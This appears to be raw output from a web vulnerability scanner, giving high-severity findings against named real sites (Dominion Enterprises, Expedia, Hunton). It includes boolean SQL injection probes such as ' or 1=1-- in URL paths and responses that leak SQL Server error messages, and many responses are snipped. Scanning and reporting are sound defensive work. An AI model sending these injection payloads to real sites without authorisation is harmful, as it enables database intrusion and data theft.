HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ad448786cf Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Careers72254876'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=7498864a68 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=50020d3c5d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=46792d7b37b Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=f73a685d8d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e2553f7484 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=1e404d82997 Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ecde5f56d9 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/For_Businesses |
GET /main/do/For_Businesses16640137'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/For_Businesses16640137'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses48717636'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32718 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/businesses48717636'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /daily/common/moreinfo |
POST /daily/common/moreinfo Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 Origin: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 1023 BundleType=1&WT=Home ...[SNIP]... rigName=&LsFlightDestTLA= |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 23:21:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX011 Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77907 <!-- srvpush1 16:21:24(:715) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepa ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=flex Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:39:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 76383 <!-- srvpush1 15:39:25(:293) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type numeric to tinyint."> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=flex Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:39:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77852 <!-- srvpush1 15:39:01(:987) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR32]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type int to tinyint."> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pubspec/scripts/eap.asp |
GET /pubspec/scripts/eap.asp Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:38:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01E Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77907 <!-- srvpush1 15:38:49(:042) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR09]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Sat, 07 May 2011 01:31:45 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 888 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:51:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 890 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Sat, 07 May 2011 00:53:50 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 921 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /aboutus/uniGC.aspx |
GET /aboutus/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:33:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1844; path=/ Set-Cookie: PortletId=5981402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48748 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:30:31 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=3dc8e81d-f541 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172253 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
